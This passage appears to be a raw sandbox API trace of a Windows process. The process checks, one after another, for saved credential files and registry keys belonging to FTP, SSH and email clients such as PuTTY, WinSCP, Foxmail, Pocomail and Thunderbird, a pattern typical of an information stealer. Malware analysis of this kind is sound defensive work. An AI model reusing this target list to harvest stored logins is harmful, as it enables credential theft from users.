(in: param_1=0x6ab500, param_2="%s\\UltraFXP\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 56 [0147.536] GetProcessHeap () returned 0x690000 [0147.536] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x74) returned 0x6a7d70 [0147.536] GetProcessHeap () returned 0x690000 [0147.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.538] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\UltraFXP\\sites.xml") returned 0 [0147.539] GetProcessHeap () returned 0x690000 [0147.539] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7d70 | out: hHeap=0x690000) returned 1 [0147.539] GetProcessHeap () returned 0x690000 [0147.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f68) returned 0x6ab500 [0147.553] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.554] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\FTP Now\\sites.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 55 [0147.554] GetProcessHeap () returned 0x690000 [0147.554] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a74f0 [0147.554] GetProcessHeap () returned 0x690000 [0147.554] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.556] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTP Now\\sites.xml") returned 0 [0147.556] GetProcessHeap () returned 0x690000 [0147.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a74f0 | out: hHeap=0x690000) returned 1 [0147.557] GetProcessHeap () returned 0x690000 [0147.557] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab500 [0147.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.558] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\VanDyke\\SecureFX", pszValue="Config Path", pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba8*=0x104) returned 0x2 [0147.558] GetProcessHeap () returned 0x690000 [0147.559] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.559] GetProcessHeap () returned 0x690000 [0147.559] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.559] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.560] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.560] GetProcessHeap () returned 0x690000 [0147.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab500 [0147.562] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.563] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Odin Secure FTP Expert\\QFDefault.QFQ", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 59 [0147.563] GetProcessHeap () returned 0x690000 [0147.563] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6aa530 [0147.563] GetProcessHeap () returned 0x690000 [0147.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.565] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\QFDefault.QFQ") returned 0 [0147.565] GetProcessHeap () returned 0x690000 [0147.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.566] GetProcessHeap () returned 0x690000 [0147.566] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.566] GetProcessHeap () returned 0x690000 [0147.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.567] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.568] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.568] GetProcessHeap () returned 0x690000 [0147.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8c) returned 0x6ab500 [0147.569] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.569] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Odin Secure FTP Expert\\SiteInfo.QFP", arglist=0x19fb94 | out: param_1="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 58 [0147.569] GetProcessHeap () returned 0x690000 [0147.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x78) returned 0x6a7770 [0147.570] GetProcessHeap () returned 0x690000 [0147.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.571] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Odin Secure FTP Expert\\SiteInfo.QFP") returned 0 [0147.572] GetProcessHeap () returned 0x690000 [0147.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a7770 | out: hHeap=0x690000) returned 1 [0147.572] GetProcessHeap () returned 0x690000 [0147.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.572] GetProcessHeap () returned 0x690000 [0147.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.572] GetProcessHeap () returned 0x690000 [0147.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b5c0 [0147.572] GetProcessHeap () returned 0x690000 [0147.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0147.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.574] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x6ab3a0 | out: phkResult=0x6ab3a0*=0x0) returned 0x2 [0147.574] GetProcessHeap () returned 0x690000 [0147.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0147.574] GetProcessHeap () returned 0x690000 [0147.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0147.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.575] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\Fling\\Accounts", phkResult=0x6ab3f0 | out: phkResult=0x6ab3f0*=0x0) returned 0x2 [0147.575] GetProcessHeap () returned 0x690000 [0147.575] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0147.575] GetProcessHeap () returned 0x690000 [0147.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.576] GetProcessHeap () returned 0x690000 [0147.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b5c0 | out: hHeap=0x690000) returned 1 [0147.576] GetProcessHeap () returned 0x690000 [0147.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.576] GetProcessHeap () returned 0x690000 [0147.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b5c0 [0147.576] GetProcessHeap () returned 0x690000 [0147.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0147.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.578] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x6ab320 | out: phkResult=0x6ab320*=0x0) returned 0x2 [0147.578] GetProcessHeap () returned 0x690000 [0147.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0147.578] GetProcessHeap () returned 0x690000 [0147.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0147.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.590] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\NCH Software\\ClassicFTP\\FTPAccounts", phkResult=0x6ab450 | out: phkResult=0x6ab450*=0x0) returned 0x2 [0147.591] GetProcessHeap () returned 0x690000 [0147.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0147.591] GetProcessHeap () returned 0x690000 [0147.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.591] GetProcessHeap () returned 0x690000 [0147.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b5c0 | out: hHeap=0x690000) returned 1 [0147.591] GetProcessHeap () returned 0x690000 [0147.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.592] GetProcessHeap () returned 0x690000 [0147.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b518 [0147.592] GetProcessHeap () returned 0x690000 [0147.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0147.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.593] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x6ab360 | out: phkResult=0x6ab360*=0x0) returned 0x2 [0147.593] GetProcessHeap () returned 0x690000 [0147.593] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0147.593] GetProcessHeap () returned 0x690000 [0147.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0147.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.595] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x6ab470 | out: phkResult=0x6ab470*=0x0) returned 0x2 [0147.595] GetProcessHeap () returned 0x690000 [0147.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0147.595] GetProcessHeap () returned 0x690000 [0147.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0147.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.596] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\SimonTatham\\PuTTY\\Sessions", phkResult=0x6ab4b0 | out: phkResult=0x6ab4b0*=0x0) returned 0x2 [0147.596] GetProcessHeap () returned 0x690000 [0147.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0147.597] GetProcessHeap () returned 0x690000 [0147.597] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0147.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.598] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\9bis.com\\KiTTY\\Sessions", phkResult=0x6ab380 | out: phkResult=0x6ab380*=0x0) returned 0x2 [0147.598] GetProcessHeap () returned 0x690000 [0147.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0147.598] GetProcessHeap () returned 0x690000 [0147.599] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.612] GetProcessHeap () returned 0x690000 [0147.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b518 | out: hHeap=0x690000) returned 1 [0147.612] GetProcessHeap () returned 0x690000 [0147.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab500 [0147.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.613] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Thunderbird", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6ab500, pcbData=0x19fba4*=0x104) returned 0x2 [0147.613] GetProcessHeap () returned 0x690000 [0147.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.613] GetProcessHeap () returned 0x690000 [0147.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6ab500 [0147.614] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.615] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Foxmail\\mail", arglist=0x19fbb8 | out: param_1="C:\\Program Files (x86)\\Foxmail\\mail") returned 35 [0147.615] GetProcessHeap () returned 0x690000 [0147.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x6aa2c8 [0147.615] GetProcessHeap () returned 0x690000 [0147.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.616] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Foxmail\\mail") returned 0 [0147.616] GetProcessHeap () returned 0x690000 [0147.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.617] GetProcessHeap () returned 0x690000 [0147.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.618] ExpandEnvironmentStringsW (in: lpSrc="%SYSTEMDRIVE%", lpDst=0x6aa2c8, nSize=0x104 | out: lpDst="C:") returned 0x3 [0147.619] Sleep (dwMilliseconds=0xa) [0147.634] GetProcessHeap () returned 0x690000 [0147.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6ab500 [0147.635] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.636] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\%s", arglist=0x19f938 | out: param_1="C:\\Foxmail*") returned 11 [0147.636] GetProcessHeap () returned 0x690000 [0147.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1a) returned 0x6a3290 [0147.636] GetProcessHeap () returned 0x690000 [0147.637] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.637] FindFirstFileW (in: lpFileName="C:\\Foxmail*" (normalized: "c:\\foxmail*"), lpFindFileData=0x19f94c | out: lpFindFileData=0x19f94c*(dwFileAttributes=0x560055, ftCreationTime.dwLowDateTime=0x580057, ftCreationTime.dwHighDateTime=0x5a0059, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x620061, ftLastWriteTime.dwLowDateTime=0x640063, ftLastWriteTime.dwHighDateTime=0x660065, nFileSizeHigh=0x680067, nFileSizeLow=0x6a0069, dwReserved0=0x6c006b, dwReserved1=0x6e006d, cFileName="opqr\x08", cAlternateFileName="ꋈjĄ")) returned 0xffffffff [0147.638] GetProcessHeap () returned 0x690000 [0147.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3290 | out: hHeap=0x690000) returned 1 [0147.638] GetProcessHeap () returned 0x690000 [0147.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.638] GetProcessHeap () returned 0x690000 [0147.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6ab500 [0147.639] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.640] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 59 [0147.640] GetProcessHeap () returned 0x690000 [0147.640] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6aa2c8 [0147.640] GetProcessHeap () returned 0x690000 [0147.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.642] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Pocomail\\accounts.ini") returned 0 [0147.643] GetProcessHeap () returned 0x690000 [0147.643] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.643] GetProcessHeap () returned 0x690000 [0147.643] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.644] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.644] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0147.644] GetProcessHeap () returned 0x690000 [0147.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f70) returned 0x6ab500 [0147.645] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.646] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\Pocomail\\accounts.ini", arglist=0x19fb50 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 53 [0147.646] GetProcessHeap () returned 0x690000 [0147.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6e) returned 0x6aa530 [0147.646] GetProcessHeap () returned 0x690000 [0147.647] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.648] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Pocomail\\accounts.ini") returned 0 [0147.648] GetProcessHeap () returned 0x690000 [0147.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.649] GetProcessHeap () returned 0x690000 [0147.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.649] GetProcessHeap () returned 0x690000 [0147.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.649] GetProcessHeap () returned 0x690000 [0147.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b578 [0147.649] GetProcessHeap () returned 0x690000 [0147.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0147.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.651] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x6ab440 | out: phkResult=0x6ab440*=0x0) returned 0x2 [0147.651] GetProcessHeap () returned 0x690000 [0147.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0147.651] GetProcessHeap () returned 0x690000 [0147.651] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0147.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.653] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\IncrediMail\\Identities", phkResult=0x6ab370 | out: phkResult=0x6ab370*=0x0) returned 0x2 [0147.653] GetProcessHeap () returned 0x690000 [0147.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0147.653] GetProcessHeap () returned 0x690000 [0147.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.654] GetProcessHeap () returned 0x690000 [0147.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b578 | out: hHeap=0x690000) returned 1 [0147.654] GetProcessHeap () returned 0x690000 [0147.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6ab500 [0147.654] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.655] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\GmailNotifierPro\\ConfigData.xml", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 69 [0147.655] GetProcessHeap () returned 0x690000 [0147.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8e) returned 0x6aa2c8 [0147.655] GetProcessHeap () returned 0x690000 [0147.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.657] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GmailNotifierPro\\ConfigData.xml") returned 0 [0147.657] GetProcessHeap () returned 0x690000 [0147.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.657] GetProcessHeap () returned 0x690000 [0147.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.658] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.659] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0147.659] GetProcessHeap () returned 0x690000 [0147.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6a) returned 0x6ab500 [0147.660] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.661] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\DeskSoft\\CheckMail", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 56 [0147.661] GetProcessHeap () returned 0x690000 [0147.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x74) returned 0x6a6ff0 [0147.661] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.669] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\DeskSoft\\CheckMail") returned 0 [0147.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6ff0 | out: hHeap=0x690000) returned 1 [0147.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.671] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.672] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0147.672] GetProcessHeap () returned 0x690000 [0147.672] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f7c) returned 0x6ab500 [0147.673] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.674] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\WinFtp Client\\Favorites.dat", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 50 [0147.674] GetProcessHeap () returned 0x690000 [0147.674] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x68) returned 0x6aa530 [0147.674] GetProcessHeap () returned 0x690000 [0147.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.678] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WinFtp Client\\Favorites.dat") returned 0 [0147.678] GetProcessHeap () returned 0x690000 [0147.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0147.679] GetProcessHeap () returned 0x690000 [0147.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0147.679] GetProcessHeap () returned 0x690000 [0147.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0147.679] GetProcessHeap () returned 0x690000 [0147.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b518 [0147.679] GetProcessHeap () returned 0x690000 [0147.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0147.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.681] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl", phkResult=0x6ab360 | out: phkResult=0x6ab360*=0x0) returned 0x2 [0147.681] GetProcessHeap () returned 0x690000 [0147.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0147.681] GetProcessHeap () returned 0x690000 [0147.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0147.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0147.683] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Martin Prikryl", phkResult=0x6ab3f0 | out: phkResult=0x6ab3f0*=0x0) returned 0x2 [0147.683] GetProcessHeap () returned 0x690000 [0147.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0147.683] GetProcessHeap () returned 0x690000 [0147.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.684] GetProcessHeap () returned 0x690000 [0147.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b518 | out: hHeap=0x690000) returned 1 [0147.684] GetProcessHeap () returned 0x690000 [0147.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0147.684] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0147.685] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Windows") returned 0x0 [0147.685] GetProcessHeap () returned 0x690000 [0147.685] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6ab500 [0147.686] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.687] wvsprintfW (in: param_1=0x6ab500, param_2="%s\\32BitFtp.TMP", arglist=0x19fba0 | out: param_1="C:\\Windows\\32BitFtp.TMP") returned 23 [0147.687] GetProcessHeap () returned 0x690000 [0147.687] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x32) returned 0x69cfa8 [0147.687] GetProcessHeap () returned 0x690000 [0147.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0147.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0147.688] PathFileExistsW (pszPath="C:\\Windows\\32BitFtp.TMP") returned 0 [0147.688] GetProcessHeap () returned 0x690000 [0147.688] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 